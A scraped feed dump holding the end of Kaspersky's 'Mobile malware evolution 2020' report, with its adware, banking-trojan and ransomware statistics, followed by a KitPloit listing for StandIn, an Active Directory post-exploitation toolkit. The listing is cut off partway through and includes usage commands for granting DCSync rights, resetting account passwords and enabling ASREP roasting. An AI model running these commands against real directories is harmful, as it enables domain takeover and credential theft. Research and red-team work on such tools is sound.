Another example of the partnership is so-called preinstall. The manufacturer of the mobile device preloads an adware application or component with the firmware. As a result, the device hits the shelves already infected. This is not a [supply chain attack](<https://encyclopedia.kaspersky.com/glossary/supply-chain/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), but a premeditated step on the part of the manufacturer, for which it receives extra profit. To add to that, no security solution is yet capable of reading an OS system partition to check if the device is infected. Even if detection is successful, the user is left alone with the threat, without any possibility of removing the malware quickly or easily, as Android system partitions are write-protected. This vector of spreading persistent threats is likely to become increasingly popular in the absence of new effective exploits for popular Android versions.

### Attacks on personal data

Almost any of the personal data stored on our smartphones can be monetized. In particular, advertisers can display targeted offerings, and attackers can access accounts with various services, such as online banking. It is thus small wonder that data is hunted: sometimes openly and sometimes illegally.

Ever since Android introduced Accessibility Services, which provide applications with access to settings and other programs, the number of malware tools that extract confidential data from mobile devices has been on the rise. The Trojan [Ghimob](<https://securelist.com/ghimob-tetrade-threat-mobile-devices/99228/>) was one of 2020's most exciting discoveries. It stole credentials for various financial systems, including online banking applications and cryptocurrency wallets, in Brazil. Ghimob used Accessibility both for extracting valuable data from application windows and for interacting with the operating system. Whenever the user tried to access the Ghimob removal menu, the Trojan immediately opened the home screen to protect itself from being uninstalled.

Another exciting discovery was the [Cookiethief](<https://securelist.com/cookiethief/96332/>) Trojan. As the name implies, the malware targeted cookies, which store unique identifiers of web sessions and hence can be used for authorization. For example, an attacker could log in to a victim's Facebook account and post a phishing link or spread spam. Typically, cookies on a mobile device are stored in a secure location and are inaccessible to applications, even malicious ones.
To circumvent the restriction, Cookiethief tried to get root privileges on the device with the help of an exploit before it began its malicious activities.

### Apple iOS

According to various sources, the proportion of Android-powered devices in relation to all mobile devices ranges from 50% to 85%, depending on the region. Apple's iOS naturally comes second. So, what were the threats to that system in 2020? According to the [Zerodium](<https://zerodium.com/program.html>) exchange, the price of an iOS exploit chain is quite impressive, albeit lower than that for Android: $2,000,000 against $2,500,000. We are not aware of the Zerodium pricing mechanics, but the information suggests that attacks on Apple devices are a very popular commodity. Effective infection is only feasible through a [drive-by download](<https://encyclopedia.kaspersky.com/glossary/drive-by-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>).

In 2020, our colleagues at TrendMicro detected the use of Apple WebKit exploits for remote code execution (RCE) in conjunction with Local Privilege Escalation exploits to deliver malware to an iOS device. The payload was the [LightSpy](<https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/>) Trojan, whose objective was to extract personal information from a mobile device, including correspondence from instant messaging apps and browser data, take screenshots, and compile a list of nearby Wi-Fi networks. The Trojan had a modular design, with its individual components receiving updates. One of the modules discovered was a network scanner that collected information about nearby devices, including their MAC addresses and manufacturer names. TrendMicro said LightSpy distribution took advantage of news portals, such as COVID-19 update sites.

## Statistics

### Number of installation packages

We discovered 5,683,694 mobile malicious installation packages in 2020, which was 2,100,000 more than in 2019.

_Mobile malicious installation packages for Android in 2017 through 2020 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2021/02/26182504/05-en-ru-es-mobile-report-2020.png>))_

The year 2020 can be said to have broken an established downward trend in the number of mobile threats discovered. There were no special factors driving that, though.

### Number of mobile users attacked

_Mobile users attacked in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125009/06-en-mobile-report-2020.png>))_

The number of users attacked steadily decreased over the past year. The number of users encountering mobile threats in 2020 was on average a quarter lower than in 2019.

_Geography of mobile threats in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125037/07-en-mobile-report-2020.png>))_

**Top 10 countries by share of users attacked by mobile malware**

| Country* | %** |
|---|---|
| Iran | 67.78 |
| Algeria | 31.29 |
| Bangladesh | 26.18 |
| Morocco | 22.67 |
| Nigeria | 22.00 |
| Saudi Arabia | 21.75 |
| India | 20.69 |
| Malaysia | 19.68 |
| Kenya | 18.52 |
| Indonesia | 17.88 |

_\* Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile security solutions in the reporting period._
_\*\* Users attacked in the country as a percentage of all users of Kaspersky Security for Mobile in the country._

Iran (67.78%) led by number of attacked users, mainly due to an aggressive spread of the AdWare.AndroidOS.Notifyer family.
An alternative Telegram client, which we detect as RiskTool.AndroidOS.FakGram.d, acted as another widespread threat. This is not malware per se, but messages sent through the app can go to unintended recipients. A frequently detected malicious program was Trojan.AndroidOS.Hiddapp.bn, whose objective was to download adware to an infected device.

Algeria ranked second with 31.29%. The AdWare.AndroidOS.FakeAdBlocker and AdWare.AndroidOS.HiddenAd families were the most widespread ones in that country. Two of the most widespread malicious programs were [Trojan-Dropper.AndroidOS.Agent.ok](<https://threats.kaspersky.com/en/threat/Trojan-Dropper.AndroidOS.Agent/>) and [Trojan.AndroidOS.Agent.sr](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Agent/>).

Rounding out the "top three" was Bangladesh with 26.18%, where the FakeAdBlocker and HiddenAd adware families were also the most widespread ones.

### Types of mobile threats

_Distribution of new mobile threats by type in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125107/08-en-mobile-report-2020.png>))_

Twelve of twenty-two types of mobile threats showed an increase in the number of detected installation packages in 2020, with the most significant growth demonstrated by adware: from 21.81% to 57.26%. In absolute terms, the number of packages more than quadrupled: 3,254,387 in 2020 against 764,265 in 2019. Unsurprisingly, the share of the former leader, RiskTool, dropped from 32.46% to 21.34%. Third place, as in 2019, was occupied by malware such as Trojan-Dropper (4.51%), whose share also decreased markedly, by 11.58 p.p.

#### Adware

The vast majority (almost 65%) of adware discovered in 2020 belonged to the [Ewind](<https://threats.kaspersky.com/en/threat/Adware.AndroidOS.Ewind/>) family. The most common member of that family was AdWare.AndroidOS.Ewind.kp, with more than 2,100,000 installation packages.

**Top 10 adware families discovered in 2020**

| Name of family | %* |
|---|---|
| Ewind | 64.93 |
| FakeAdBlocker | 15.27 |
| HiddenAd | 10.09 |
| Inoco | 2.16 |
| Agent | 1.12 |
| Dnotua | 0.84 |
| MobiDash | 0.69 |
| SplashAd | 0.66 |
| Vuad | 0.64 |
| Dowgin | 0.47 |

_\* Share of the adware family in the total number of adware packages_

The Ewind family is an example of aggressive adware. Its members try to monitor the user's activities and counteract attempts at removal. In particular, the aforementioned Ewind.kp variant displays an error message upon starting.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125804/mobile_report_2020_04.png>) 
**_AdWare.AndroidOS.Ewind.kp screenshot_**

As soon as the user taps OK, the app window closes and its icon is hidden from the home screen. After that, Ewind.kp monitors the user's activity and displays advertising windows at certain points. In addition to banners in the notification bar, the app opens promoted sites, such as online casinos, in a separate browser window.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125835/mobile_report_2020_05.png>) 
**_Advertising banner (left) and open Ewind.kp browser window with a promoted website (right)_**

Where did the more than two million Ewind.kp packages come from? Its creators exploit the content of legitimate applications, such as icons and resource files. The resulting packages seldom do anything useful, but Ewind applications created with others' content could fill up a fake app marketplace. They all have diverse names, icons and installation package sizes, so an unsophisticated user might not even suspect anything is amiss about the store.

The best part of it is that the AdWare.AndroidOS.Ewind.kp variant has been known since 2018, and we have never once had to adjust the process of detecting it in almost three years. Individuals who generate that many installation packages are obviously not worried about antivirus software.

#### RiskTool

RiskTool-class applications remained one of the three most relevant threats even without showing significant growth in 2020. Their share declined in relation to others, but in absolute terms, the threats in that class even gained relevance. The major contributing factor was the SMSReg family, which doubled in number to 424,776 applications compared to 2019.

**Top 10 RiskTool families discovered in 2020**

| Name of family | %* |
|---|---|
| SMSreg | 41.75 |
| Robtes | 16.13 |
| Agent | 9.67 |
| Dnotua | 7.72 |
| Resharer | 7.50 |
| Skymobi | 5.29 |
| Wapron | 3.42 |
| SmsPay | 2.78 |
| PornVideo | 1.41 |
| Paccy | 0.76 |

_\* Share of the RiskTool family in the total number of RiskTool packages_

#### Other threats

The number of backdoors detected almost tripled, from **28,889** in 2019 to **84,495** in 2020. However, most of the detected threats notably belonged to older families whose relevance was questionable. Where did these come from? Many members of these families became publicly available, serving as test subjects: for instance, their code was obfuscated to test the antivirus engine's detection quality. This does not make a whole lot of sense, as obfuscation is only effective against engines with very limited capabilities. More importantly, however, the legality of these activities is doubtful: lab tests on malware code are acceptable, but publication of samples is ethically questionable at the very least.

The number of detected Android exploits increased seventeenfold.
LPE exploits, relevant to Android versions 4 through 7, accounted for most of the growth. As for exploits for more recent versions of that OS, they are typically device-specific.

The number of Trojan-Proxy threats increased twelvefold. This type of malware is used by hackers to establish secure tunnels, which they can then use as they see fit. A major threat to the victims is the use of their mobile devices as an intermediary in criminal offenses, e.g. downloading child pornography. This may result in law enforcement agencies taking an interest in the owner of the infected device and asking them questions they would rather avoid. For companies, a secure tunnel between an infected corporate smartphone and an unknown attacker means unauthorized third-party access to internal infrastructure, which, to put it mildly, is undesirable.

#### Top 20 mobile malware programs

_The following malware rankings omit riskware, such as RiskTool and AdWare._

| | Verdict | %* |
|---|---|---|
| 1 | DangerousObject.Multi.Generic | 36.95 |
| 2 | Trojan.AndroidOS.Boogr.gsh | 9.54 |
| 3 | DangerousObject.AndroidOS.GenericML | 6.63 |
| 4 | Trojan-Downloader.AndroidOS.Necro.d | 4.08 |
| 5 | Trojan-Dropper.AndroidOS.Hqwar.cf | 4.02 |
| 6 | Trojan-SMS.AndroidOS.Agent.ado | 4.02 |
| 7 | Trojan.AndroidOS.Hiddad.fi | 2.64 |
| 8 | Trojan.AndroidOS.Agent.vz | 2.60 |
| 9 | Trojan-Downloader.AndroidOS.Helper.a | 2.51 |
| 10 | Trojan.AndroidOS.Handda.san | 1.96 |
| 11 | Trojan-Downloader.AndroidOS.Agent.ic | 1.80 |
| 12 | Trojan-Downloader.AndroidOS.Agent.hy | 1.67 |
| 13 | Trojan.AndroidOS.MobOk.v | 1.60 |
| 14 | Trojan.AndroidOS.LockScreen.ar | 1.49 |
| 15 | Trojan.AndroidOS.Piom.agcb | 1.49 |
| 16 | Trojan.AndroidOS.Hiddapp.ch | 1.46 |
| 17 | Exploit.AndroidOS.Lotoor.be | 1.39 |
| 18 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.34 |
| 19 | Trojan.AndroidOS.Necro.a | 1.29 |
| 20 | Trojan-Dropper.AndroidOS.Agent.rb | 1.26 |

_\* Share of users attacked by this type of malware in total attacked users_

The leaders among the twenty most widespread malicious mobile applications were unchanged from 2019, with only their shares changing slightly. The leader was DangerousObject.Multi.Generic (36.95%), the verdict we use for malware detected by using cloud technology. The verdict is applied where the antivirus databases still lack the signatures or heuristics for detection. The most recent malware is detected that way.

The Trojan.AndroidOS.Boogr.gsh verdict ranked second with 9.54%. It is assigned to files recognized as malicious by our ML-powered system. Another result of this system's work is objects with the verdict DangerousObject.AndroidOS.GenericML (6.63%, ranking third). The verdict is assigned to files whose structure bears a strong similarity to previously known ones.

Trojan-Downloader.AndroidOS.Necro.d (4.08%) ranked fourth. Unlike other malicious programs in that family, which are installation packages, the Necro.d variant is a native ELF executable. We typically detected that Trojan in the read-only system area. It could only make its way there via another Trojan that exploited system privileges or as part of the firmware. Necro.d apparently used the latter path, as one of its capabilities is uploading KINGROOT, a package used for elevation of privileges. Necro.d's mission is to download, install and run other apps when instructed by attackers. In addition, it provides remote access to the shell of the infected device.

The Hqwar dropper ranked fifth and eighteenth simultaneously. This malicious "phoenix" seems to be rising from the ashes, with 39,000 users found to be infected in 2020 compared to 28,000 in 2019. Hqwar in a nutshell:

 * This is a nesting-doll malicious program that has an external dropper shell around an obfuscated DEX executable payload.
 * Its main objective is evading detection by the antivirus engine if the device has a security solution installed.
 * Banking Trojans typically serve as the payload.

_Number of users attacked by Hqwar droppers in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125142/09-en-mobile-report-2020.png>))_

In most cases, banking Trojans unloaded by Hqwar were focused on targets in Russia, specifically, applications operated by Russian financial institutions.

**Top 10 countries by number of users attacked by Hqwar**

| | Country | Number of attacked users |
|---|---|---|
| 1 | Russia | 305861 |
| 2 | Turkey | 22138 |
| 3 | Spain | 15160 |
| 4 | Italy | 8314 |
| 5 | Germany | 3659 |
| 6 | Poland | 3072 |
| 7 | Egypt | 2938 |
| 8 | Australia | 2465 |
| 9 | Great Britain | 1446 |
| 10 | USA | 1351 |

Trojan-SMS.AndroidOS.Agent.ado (4.02%) ranked sixth in the Top 20 list of mobile malicious programs. This is a typical example of the kind of old-school text-message scams that were popular in 2011 and 2012. Their enduring relevance is a surprise. The Trojan targets Russian-speaking audiences, as Russia is a country with a mature market for buying content by sending text messages to paid phone numbers. This is a modern design, though: the Trojan uses an obfuscator as protection against [reverse engineering](<https://encyclopedia.kaspersky.com/glossary/reverse-engineering/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and detection, and receives commands from external operators. Agent.ado is distributed under the guise of an app installer.

Trojan.AndroidOS.Hiddad.fi (2.64%) ranked seventh.
This Trojan handles the installation of adware in an infected system, but it can display ads as well.

Trojan.AndroidOS.Agent.vz (2.60%) ranked eighth. It is a malicious module loaded by other Trojans, including members of the Necro family. It serves as an intermediate link in the infection chain and is responsible for downloading further modules, for instance the Ewind adware mentioned above.

Trojan-Downloader.AndroidOS.Helper.a (2.51%) ranked ninth. It exemplifies the [occasional difficulty of removing](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>) mobile malware from the system. Helper is part of a chain that includes Trojans elevating their access rights on the device and writing themselves or Helper to the system area. In addition to that, the Trojans make changes to the factory reset process, leaving the user few chances to get rid of the malware without outside help. The approach is nothing new, but we saw plenty of users complaining on the Internet about the difficulty they were having removing Helper, something we had not seen before.

Trojan.AndroidOS.Handda.san (1.96%) rounds out the first ten. This verdict is an umbrella for a whole group of malicious programs, which include Trojans with shared capabilities: icon hiding, obtaining Device Admin rights and using packers to counteract detection.

Trojans in the Trojan-Downloader.AndroidOS.Agent family ranked eleventh and twelfth, their only objective being to download a payload when instructed by the operators. In both cases, the payload is encrypted, and the traffic cannot be interpreted to indicate what exactly is being loaded onto the device.

Trojan.AndroidOS.MobOk.v (1.60%) ranked thirteenth. MobOk Trojans can automatically subscribe a victim to paid services. They attempted to attack users in Russia more frequently than others in 2020.

The primitive Trojan.AndroidOS.LockScreen.ar Trojan (1.49%) ranked fourteenth. This malware was first spotted in 2017. Locking the device screen is its only mission.

Trojan.AndroidOS.Hiddapp.ch (1.46%) ranked sixteenth. We assign this verdict to any app that hides its icon in the list of apps immediately upon starting. Subsequent steps may vary, but these are typically downloading or dropping other apps, or displaying ads.

Exploit.AndroidOS.Lotoor.be (1.39%), a local exploit for elevating privileges to the superuser, ranked seventeenth. Its popularity should not be surprising, as this type of malware is capable of downloading Necro, Helper and other Trojans in our Top 20.

Trojan.AndroidOS.Necro.a (1.29%), which ranked nineteenth, is a chain of Trojans. It takes root in the system, and it sometimes proves difficult to remove, along with associated Trojans.

Rounding out our Top 20 is Trojan-Dropper.AndroidOS.Agent.rb (1.26%). It serves various groups, and the objects it is used to pack include both malware and perfectly legitimate software. There are notably two variants: in the first, the code for decrypting the payload is located in a native library loaded from the main DEX file, and in the second, the dropper code is concentrated within the body of the main DEX file.

### Mobile banking trojans

We detected 156,710 installation packages for mobile banking Trojans in 2020, which is twice the previous year's figure and comparable to 2018.

_Mobile banking Trojan installation packages detected by Kaspersky in 2017 through 2020 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2021/02/26182758/10-en-ru-es-mobile-report-2020.png>))_

Whereas the statistics for 2018 were seriously affected by an epidemic of the Asacub Trojan, the major culprits last year were objects from the [Trojan.AndroidOS.Agent](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Agent/>) family.
That family's share was just 19.06% in 2019, jumping to 72.79% in 2020.

**Top 10 banking trojans discovered in 2020**

| Name of family | %* |
|---|---|
| Agent | 72.79 |
| Wroba | 5.44 |
| Rotexy | 5.18 |
| Anubis | 2.88 |
| Faketoken | 2.48 |
| Zitmo | 2.16 |
| Knobot | 1.53 |
| Gustuff | 1.48 |
| Cebruser | 1.43 |
| Asacub | 1.07 |

_\* Share of the mobile banker trojan family in the total number of mobile banker trojan packages_

Agent.eq was the most prolific of all Agent (72.79%) variants. The heuristics turned out to be universal, helping us detect malware belonging to [Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>), Wroba and other families.

The Korean malware [Wroba](<https://securelist.com/roaming-mantis-part-v/96250/>), spread by its operators through [smishing](<https://encyclopedia.kaspersky.com/glossary/smishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), in particular by sending fake text messages from a logistics company, ranked second. Like many others of its kind, the malware shows the victim one of a number of preset phishing windows, depending on which financial app is running on the home screen.

The rest of the programs included in the rankings have been well known to researchers for a long time. One exception might be Knobot (1.53%), a relatively new player that targets financial data. Along with phishing windows and interception of 2FA verification messages, the Trojan is equipped with several tools that are uncharacteristic of financial threats. An example of these is hijacking device PINs through exploitation of Accessibility Services. The hackers might need the PIN for manually controlling the device in real time.

_Attacks by mobile banking trojans in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125244/11-en-mobile-report-2020.png>))_

The surge in attacks in August 2020 is attributed to the Asacub, Agent and Rotexy families. It is through their escalating spread that the stable picture observed up until July changed.

**Top 10 families of mobile bankers**

| Family | %* |
|---|---|
| Asacub | 25.63 |
| Agent | 17.97 |
| Rotexy | 17.92 |
| Svpeng | 12.81 |
| Anubis | 12.36 |
| Faketoken | 10.97 |
| Hqwar | 5.59 |
| Cebruser | 2.52 |
| Gugi | 1.45 |
| Knobot | 1.08 |

_\* Share of users attacked by the family of mobile bankers in total users attacked by mobile banking Trojans_

_Geography of mobile banker attacks in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125315/12-en-mobile-report-2020.png>))_

**Top 10 countries by share of users attacked by mobile bankers**

| | Country* | %** |
|---|---|---|
| 1 | Japan | 2.83 |
| 2 | Taiwan Province, China | 0.87 |
| 3 | Spain | 0.77 |
| 4 | Italy | 0.71 |
| 5 | Turkey | 0.60 |
| 6 | South Korea | 0.34 |
| 7 | Russia | 0.25 |
| 8 | Tajikistan | 0.21 |
| 9 | Poland | 0.17 |
| 10 | Australia | 0.15 |

_\* Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile solutions in the reporting period._
_\*\* Unique users attacked by mobile bankers in the country as a percentage of all users of Kaspersky mobile solutions in the country._

Compared to 2019, the distribution of countries by number of users attacked by mobile bankers changed significantly. Russia (0.25%), which had ranked first for three years, dropped to seventh place. Japan (2.83%), where the aforementioned Wroba raged, ranked first. The situation was similar in Taiwan (0.87%), which ranked second in our Top 10. Third was Spain (0.77%), where the most popular bankers were Cebruser and Ginp.

Italy (0.71%) ranked fourth. The most common threats in that country were Cebruser and Knobot. In Turkey (0.60%), ranked fifth, users of Kaspersky security solutions most often encountered the Cebruser and Anubis families.

The most widespread banking Trojan in Russia (0.25%) was Trojan-Banker.AndroidOS.Rotexy.e, followed by Svpeng.q and Asacub.snt.

### Mobile ransomware Trojans

We found 20,708 installation packages for ransomware Trojans in 2020, a 3.5-fold decrease from the previous year.

_Ransomware Trojan installation packages in 2018 through 2020 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2021/02/26182928/13-en-ru-es-mobile-report-2020.png>))_

Overall, the decrease in ransomware can be associated with the assumption that attackers have been converting from ransomware to bankers or combining the features of the two. Current versions of Android prevent applications from locking the screen, so even a successful ransomware infection is useless.

However, in the field of mobile ransomware, we were in for a nasty surprise.

_Users attacked by mobile ransomware Trojans in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125414/14-en-mobile-report-2020.png>))_

Whereas the beginning of 2020 saw a decrease in the number of users attacked by ransomware Trojans, we observed a spike in September, with the indicator then returning to July's figures.

Looking closer, we found that Trojan-Ransom.Win32.Encoder.jya was the most widespread type of ransomware in September. As the verdict shows, the malware is not designed for the Android platform: it is an encryptor that targets files on Windows workstations. How did that end up on mobile devices? The explanation is simple: September saw Encoder.jya spread via Telegram, and the instant messaging app has both a mobile and a desktop client. The attackers clearly targeted Windows users, while mobile users received the malware, one might say, accidentally, due to the mobile version of Telegram syncing downloads with the desktop client. Once in the smartphone memory, the malware was successfully detected by Kaspersky security solutions. A file containing Encoder.jya was most often named 2-5368451284523288935.rar or AIDS NT.rar.

_Geography of mobile ransomware attacks in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125444/15-en-mobile-report-2020.png>))_

**Top 10 countries by share of users attacked by ransomware Trojans**

| Country* | %** |
|---|---|
| USA | 2.25 |
| Kazakhstan | 0.77 |
| Iran | 0.35 |
| China | 0.21 |
| Italy | 0.14 |
| Canada | 0.11 |
| Mexico | 0.09 |
| Saudi Arabia | 0.08 |
| Australia | 0.08 |
| Great Britain | 0.07 |

_\* Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile solutions in the reporting period._
_\*\* Unique users attacked by mobile ransomware in the country as a percentage of all users of Kaspersky mobile solutions in the country._

As in 2019, the United States was the country with the most attacked users (2.25%) in 2020. The most common family of mobile ransomware in the country was Svpeng. Kazakhstan (0.77%) ranked second again, Rkor being the most widespread ransomware in that country. Iran (0.35%) remained in third position in our Top 10. The most common type of mobile ransomware there was Trojan-Ransom.AndroidOS.Small.n.

## Conclusion

The 2020 pandemic has affected every aspect of our lives, and the landscape of mobile threats has been no exception.
We saw a decrease in the number of attacks in the first half of the year, which can be attributed to the confusion of the first months of the pandemic: the attackers had other things to worry about. They were back at it in the second half, though, and we saw an increase in attacks involving mobile bankers, such as Asacub and Wroba. Besides that, we saw stronger interest in banking data, both from criminal groups specializing in mass infections and from those who prefer to select their targets carefully. And this, too, was affected by the pandemic: the inability to visit a bank branch forced customers to switch to mobile and online banking, and banks, to consider stepping up the development of those services.\n\nAnother statistically interesting event was an increase in adware, with the Ewind family making a major contribution to this: we discovered more than 2,000,000 packages of the Ewind.kp variant alone. However, these volumes had little, if any, impact on attack statistics. Coupled with Ewind.kp developers' reluctance to make changes to the core application code, this may indicate that they have opted for quantity over quality.", "modified": "2021-03-01T14:00:29", "published": "2021-03-01T14:00:29", "id": "SECURELIST:C25F1198EDCDE239973899A9C2CEC5C9", "href": "https://securelist.com/mobile-malware-evolution-2020/101029/", "type": "securelist", "title": "Mobile malware evolution 2020", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2021-03-01T15:43:24", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-jb6Ku2Gy9wM/YDSZB-s8ZQI/AAAAAAAAVdA/JOvJA8C4DIoIzpOC8BQlEQtozg3LRwHMACNcBGAsYHQ/s870/StandIn_1_Silk_StandIn.png>)\n\n \n\n\nStandIn is a small AD post-compromise toolkit. StandIn came about because recently at [ xforcered ](<https://github.com/xforcered> \"xforcered\" ) we needed a .NET native solution to perform resource based constrained delegation. 
However, StandIn quickly ballooned to include a number of comfort features.

I want to continue developing StandIn to teach myself more about Directory Services programming and to hopefully expand a tool which fits into the AD [post-exploitation](https://www.kitploit.com/search/label/Post-Exploitation) toolchain.

**Roadmap**

**Contributing**

Contributions are most welcome. Please ensure pull requests include the following items: a description of the functionality, a brief technical explanation and sample output.

**ToDo's**

The following items are currently on the radar for implementation in subsequent versions of StandIn.

* Domain share enumeration. This can be split into two parts: (1) finding and getting a unique list based on user home directories / script paths / profile paths and (2) querying fTDfs / msDFS-Linkv2 objects.
* Finding and parsing GPOs to map users to host local groups.

**Subject References**

* An ACE up the sleeve (by [@_wald0](https://twitter.com/_wald0) & [@harmj0y](https://twitter.com/harmj0y)) - [here](https://www.blackhat.com/docs/us-17/wednesday/us-17-Robbins-An-ACE-Up-The-Sleeve-Designing-Active-Directory-DACL-Backdoors-wp.pdf)
* Kerberoasting (by [@_xpn_](https://twitter.com/_xpn_)) - [here](https://blog.xpnsec.com/kerberos-attacks-part-1/)
* Roasting AS-REPs (by [@harmj0y](https://twitter.com/harmj0y)) - [here](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/)
* Kerberos Unconstrained Delegation (by [@spotheplanet](https://twitter.com/spotheplanet)) - [here](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
* S4U2Pwnage (by [@harmj0y](https://twitter.com/harmj0y)) - [here](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)
* Resource-based Constrained Delegation (by [@spotheplanet](https://twitter.com/spotheplanet)) - [here](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution)
* Rubeus - [here](https://github.com/GhostPack/Rubeus)
* Powerview - [here](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
* Powermad (by [@kevin_robertson](https://twitter.com/kevin_robertson)) - [here](https://github.com/Kevin-Robertson/Powermad)

**Index**

* [Help](https://github.com/FuzzySecurity/StandIn#help)
* [LDAP Object Operations](https://github.com/FuzzySecurity/StandIn#ldap-object-operations)
  * [Get object](https://github.com/FuzzySecurity/StandIn#get-object)
  * [Get object access permissions](https://github.com/FuzzySecurity/StandIn#get-object-access-permissions)
  * [Grant object access permission](https://github.com/FuzzySecurity/StandIn#grant-object-access-permission)
  * [Set object password](https://github.com/FuzzySecurity/StandIn#set-object-password)
  * [Add ASREP to object flags](https://github.com/FuzzySecurity/StandIn#addremove-asrep-from-object-flags)
  * [Remove ASREP from object flags](https://github.com/FuzzySecurity/StandIn#addremove-asrep-from-object-flags)
  * [ASREP](https://github.com/FuzzySecurity/StandIn#asrep)
  * [SPN](https://github.com/FuzzySecurity/StandIn#spn)
  * [Unconstrained / constrained / resource-based constrained delegation](https://github.com/FuzzySecurity/StandIn#unconstrained--constrained--resource-based-constrained-delegation)
  * [DC's](https://github.com/FuzzySecurity/StandIn#dcs)
* [Groups Operations](https://github.com/FuzzySecurity/StandIn#groups-operations)
  * [List group membership](https://github.com/FuzzySecurity/StandIn#list-group-membership)
  * [Add user to group](https://github.com/FuzzySecurity/StandIn#add-user-to-group)
* [Machine Object Operations](https://github.com/FuzzySecurity/StandIn#machine-object-operations)
  * [Create machine object](https://github.com/FuzzySecurity/StandIn#create-machine-object)
  * [Disable machine object](https://github.com/FuzzySecurity/StandIn#disable-machine-object)
  * [Delete machine object](https://github.com/FuzzySecurity/StandIn#delete-machine-object)
  * [Add msDS-AllowedToActOnBehalfOfOtherIdentity](https://github.com/FuzzySecurity/StandIn#add-msds-allowedtoactonbehalfofotheridentity)
  * [Remove msDS-AllowedToActOnBehalfOfOtherIdentity](https://github.com/FuzzySecurity/StandIn#remove-msds-allowedtoactonbehalfofotheridentity)
* [Detection](https://github.com/FuzzySecurity/StandIn#detection)

**Help**

      __
     ( _/_ _// ~b33f
     __)/(//)(/(/) v0.8

    >--~~--> Args? <--~~--<

    --help        This help menu
    --object      LDAP filter, e.g. samaccountname=HWest
    --computer    Machine name, e.g. Celephais-01
    --group       Group name, e.g. "Necronomicon Admins"
    --ntaccount   User name, e.g. "REDHOOK\UPickman"
    --sid         String SID representing a target machine
    --grant       User name, e.g. "REDHOOK\KMason"
    --guid        Rights GUID to add to object, e.g. 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
    --domain      Domain name, e.g. REDHOOK
    --user        User name
    --pass        Password
    --newpass     New password to set for object
    --type        Rights type: GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync
    --spn         Boolean, list kerberoastable accounts
    --delegation  Boolean, list accounts with unconstrained / constrained delegation
    --asrep       Boolean, list ASREP roastable accounts
    --dc          Boolean, list all domain controllers
    --remove      Boolean, remove msDS-AllowedToActOnBehalfOfOtherIdentity property from machine object
    --make        Boolean, make machine; ms-DS-MachineAccountQuota applies
    --disable     Boolean, disable machine; should be the same user that created the machine
    --access      Boolean, list access permissions for object
    --delete      Boolean, delete machine from AD; requires elevated AD access

    >--~~--> Usage? <--~~--<

    # Query object properties by LDAP filter
    StandIn.exe --object "(&(samAccountType=805306368)(servicePrincipalName=*vermismysteriis.redhook.local*))"
    StandIn.exe --object samaccountname=Celephais-01$ --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Query object access permissions, optionally filter by NTAccount
    StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --access
    StandIn.exe --object samaccountname=Rllyeh$ --access --ntaccount "REDHOOK\EDerby"
    StandIn.exe --object samaccountname=JCurwen --access --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Grant object access permissions
    StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --type DCSync
    StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
    StandIn.exe --object samaccountname=SomeTarget001$ --grant "REDHOOK\MBWillett" --type GenericWrite --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Set object password
    StandIn.exe --object samaccountname=SomeTarget001$ --newpass "Arkh4mW1tch!"
    StandIn.exe --object samaccountname=BJenkin --newpass "Dr34m1nTh3H#u$e" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Add ASREP to userAccountControl flags
    StandIn.exe --object samaccountname=HArmitage --asrep
    StandIn.exe --object samaccountname=FMorgan --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

    # Remove ASREP from userAccountControl flags
